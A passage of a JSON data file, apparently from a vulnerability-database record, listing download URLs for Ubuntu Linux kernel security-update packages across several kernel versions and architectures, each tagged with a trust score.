        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28_2.6.24-28.70_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306_2.6.32-306.11_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.32-306.11_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-virtual_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-19.61_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-306-ec2_2.6.32-306.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32-205.18.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-22.60_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-608.14.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-server_2.6.31-22.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-preempt_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-386_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
